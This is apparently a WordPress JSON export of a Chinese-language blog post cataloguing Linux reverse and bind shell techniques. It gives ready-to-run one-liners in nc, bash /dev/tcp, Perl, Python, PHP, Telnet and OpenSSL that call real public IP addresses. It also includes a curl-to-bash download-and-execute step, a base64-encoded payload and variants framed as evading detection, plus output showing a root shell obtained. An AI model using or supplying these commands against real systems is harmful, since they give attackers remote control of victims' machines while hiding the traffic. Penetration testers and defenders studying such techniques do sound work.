{"id":1361,"date":"2025-01-19T21:25:52","date_gmt":"2025-01-19T13:25:52","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=1361"},"modified":"2025-01-19T21:25:54","modified_gmt":"2025-01-19T13:25:54","slug":"05-linux%e5%8f%8d%e5%bc%b9shell%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/01\/19\/05-linux%e5%8f%8d%e5%bc%b9shell%e6%96%b9%e6%b3%95\/","title":{"rendered":"05. Linux\u53cd\u5f39Shell\u65b9\u6cd5"},"content":{"rendered":"<h3>\u4e00\u3001NC\uff08linux\u81ea\u5e26\u5de5\u5177\uff09<\/h3>\n<h4>1.NC\u6b63\u5411Shell(\u6bd4\u8f83\u5c11\u7528\uff0c\u9ed1\u5ba2\u5728\u516c\u7f51\uff0c\u53d7\u5bb3\u8005\u5728\u5185\u7f51)<\/h4>\n<pre><code>\u88ab\u63a7\u7aef\uff1a\nnc -lvvp 6666 -e \/bin\/sh\n\n\u63a7\u5236\u7aef\uff1a\nnc 10.10.1.7 6666\n\n\u539f  \u7406\uff1a\n\u88ab\u63a7\u7aef\u4f7f\u7528nc\u5c06\/bin\/sh\u7ed1\u5b9a\u5230\u672c\u5730\u76846666\u7aef\u53e3\uff0c\u63a7\u5236\u7aef\u4e3b\u52a8\u8fde\u63a5\u88ab\u63a7\u7aef\u76846666\u7aef\u53e3\uff0c\u5373\u53ef\u83b7\u5f97shell\n<\/code><\/pre>\n<h4>2.NC\u53cd\u5411Shell(\u4e00\u822c\u90fd\u7528\u8fd9\u4e2a\uff0c\u53d7\u5bb3\u8005\u4e3b\u52a8\u8fde\u63a5\u9ed1\u5ba2)<\/h4>\n<pre><code>\u63a7\u5236\u7aef\uff1a \nnc -lvvp 6666 \n\n\u88ab\u63a7\u7aef\uff1a \nnc -e \/bin\/sh 10.10.1.11 6666\n\n\u539f\u7406\uff1a \n\u88ab\u63a7\u7aef\u4f7f\u7528nc\u5c06\/bin\/sh\u53d1\u9001\u5230\u63a7\u5236\u7aef\u76846666\u7aef\u53e3\uff0c\u63a7\u5236\u7aef\u53ea\u9700\u8981\u76d1\u542c\u672c\u5730\u76846666\u7aef\u53e3\uff0c\u5373\u53ef\u83b7\u5f97shell\u3002\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217144055.png\" alt=\"Pasted image 20241217144055.png\"><\/p>\n<h3>\u4e8c\u3001Bash\uff08linux\u81ea\u5e26\u5de5\u5177\uff09<\/h3>\n<pre><code>\u88ab\u63a7\u7aef\uff1a\nbash -i &gt;&amp; \/dev\/tcp\/47.101.214.85\/6666 0&gt;&amp;1 \n\n\u63a7\u5236\u7aef\uff1a \nnc \u2013lvvp 
6666\n<\/code><\/pre>\n<p>\u53d8\u79cd\uff08\u9632\u6b62\u88ab\u53d1\u73b0\uff09\uff1a<\/p>\n<pre><code>\u88ab\u63a7\u7aef\uff1a\nexec 5&lt;&gt;\/dev\/tcp\/139.155.49.43\/6666;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done\n\n\u63a7\u5236\u7aef\uff1a\nnc \u2013lvvp 6666\n\nbase64\u7f16\u7801\u7ed5\u8fc7\uff1a \nbash -c &quot;echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDEuMjE0Ljg1LzY2NjYgMD4mMQ==|base64 -d|bash -i&quot;\n<\/code><\/pre>\n<h3>\u4e09\u3001Perl\uff08\u811a\u672c\u8bed\u8a00\uff09&#8211;socket\u7f16\u7a0b<\/h3>\n<p>\u53ea\u9700\u5c06ip\u6539\u4e3a\u9ed1\u5ba2ip\u5c31\u884c<\/p>\n<pre><code>perl -e 'use Socket;$i=&quot;47.101.214.85&quot;;$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};'\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217145712.png\" alt=\"Pasted image 20241217145712.png\"><\/p>\n<pre><code>perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&quot;47.101.214.85:6666&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217150122.png\" alt=\"Pasted image 20241217150122.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217150050.png\" alt=\"Pasted image 20241217150050.png\"><\/p>\n<h3>\u56db\u3001Curl\uff08curl\u7a0b\u5e8f\uff09<\/h3>\n<h4>1.vps<\/h4>\n<pre><code>root@VM-0-2-ubuntu:~# cat index.html\nbash -i &gt;&amp; \/dev\/tcp\/139.155.49.43\/6666 0&gt;&amp;1\n\nroot@VM-0-2-ubuntu:~# python3 -m http.server\nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\n47.101.214.85 - - [03\/Dec\/2020 09:21:39] 
&quot;GET \/index.html HTTP\/1.1&quot; 200 -\n<\/code><\/pre>\n<h4>2.target<\/h4>\n<pre><code>curl 139.155.49.43:8000|bash\n\u6216\ncurl http:\/\/139.155.49.43:8000\/index.html|bash\n<\/code><\/pre>\n<h4>3.\u6d4b\u8bd5\u7ed3\u679c<\/h4>\n<pre><code>root@VM-0-2-ubuntu:~# nc -lvvp 6666\nListening on [0.0.0.0] (family 0, port 6666)\nConnection from 47.101.214.85 46370 received!\nroot@iZuf6j06q5f1lZ:~#\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217153716.png\" alt=\"Pasted image 20241217153716.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217153733.png\" alt=\"Pasted image 20241217153733.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217153658.png\" alt=\"Pasted image 20241217153658.png\"><\/p>\n<h3>\u4e94\u3001Python\uff08\u811a\u672c\u8bed\u8a00\uff09<\/h3>\n<p>Python\u4e00\u884c\u547d\u4ee4\u53cd\u5f39shell<\/p>\n<pre><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;47.101.214.85&quot;,6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);'\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217154133.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217154133.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241217154133.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217154119.png\" alt=\"Pasted image 20241217154119.png\"><\/p>\n<h3>\u516d\u3001PHP\uff08\u811a\u672c\u8bed\u8a00\uff09<\/h3>\n<p>PHP\u4e00\u884c\u547d\u4ee4\u53cd\u5f39shell<\/p>\n<pre><code>php -r '$sock=fsockopen(&quot;47.101.214.85&quot;,6666);exec(&quot;\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);'\n<\/code><\/pre>\n<h3>\u4e03\u3001Telnet\uff08\u8fdc\u7a0b\u8fde\u63a5\u5de5\u5177\uff09<\/h3>\n<pre><code>\u653b\u51fb\u673a\uff1a\nnc -lvvp 5555\nnc -lvvp 6666\n\n\u76ee\u6807\u673a\uff1a \ntelnet 47.101.214.85 5555 | \/bin\/bash | telnet 47.101.214.85 6666\n<\/code><\/pre>\n<h3>\u516b\u3001OpenSSL\uff08\u5de5\u5177\uff09<\/h3>\n<p>openssl\u53cd\u5f39443\u7aef\u53e3\uff0c\u6d41\u91cf\u52a0\u5bc6\u4f20\u8f93<\/p>\n<ol>\n<li>\u5728\u8fdc\u7a0b\u653b\u51fb\u4e3b\u673a\u4e0a\u751f\u6210\u5bc6\u94a5\u6587\u4ef6<\/li>\n<\/ol>\n<pre><code>openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n<\/code><\/pre>\n<ol start=\"2\">\n<li>\u5728\u8fdc\u7a0b\u653b\u51fb\u4e3b\u673a\u4e0a\u542f\u52a8\u76d1\u542c\u5668<\/li>\n<\/ol>\n<pre><code>openssl s_server -quiet -key key.pem -cert cert.pem -port 443\n<\/code><\/pre>\n<ol start=\"3\">\n<li>\u5728\u76ee\u6807\u673a\u4e0a\u53cd\u5f39shell<\/li>\n<\/ol>\n<pre><code>mkfifo \/tmp\/s; \/bin\/sh -i &lt; \/tmp\/s 2&gt;&amp;1 | openssl s_client -quiet -connect 10.34.126.129:443 &gt; \/tmp\/s\n<\/code><\/pre>\n<p>\u5982\u679c\/tmp\/s\u6587\u4ef6\u5b58\u5728,\u5220\u9664<\/p>\n<pre><code>rm \/tmp\/s\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217160102.png\" alt=\"Pasted 
image 20241217160102.png\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241217160048.png\" alt=\"Pasted image 20241217160048.png\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001NC\uff08linux\u81ea\u5e26\u5de5\u5177\uff09 1.NC\u6b63\u5411Shell(\u6bd4\u8f83\u5c11\u7528\uff0c\u9ed1\u5ba2\u5728\u516c\u7f51\uff0c\u53d7\u5bb3\u8005\u5728\u5185\u7f51) \u88ab\u63a7\u7aef\uff1a nc  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,9],"tags":[],"class_list":["post-1361","post","type-post","status-publish","format-standard","hentry","category-linuxshell","category-9"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1361","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1361"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1361\/revisions"}],"predecessor-version":[{"id":1362,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1361\/revisions\/1362"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1361"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1361"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1361"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}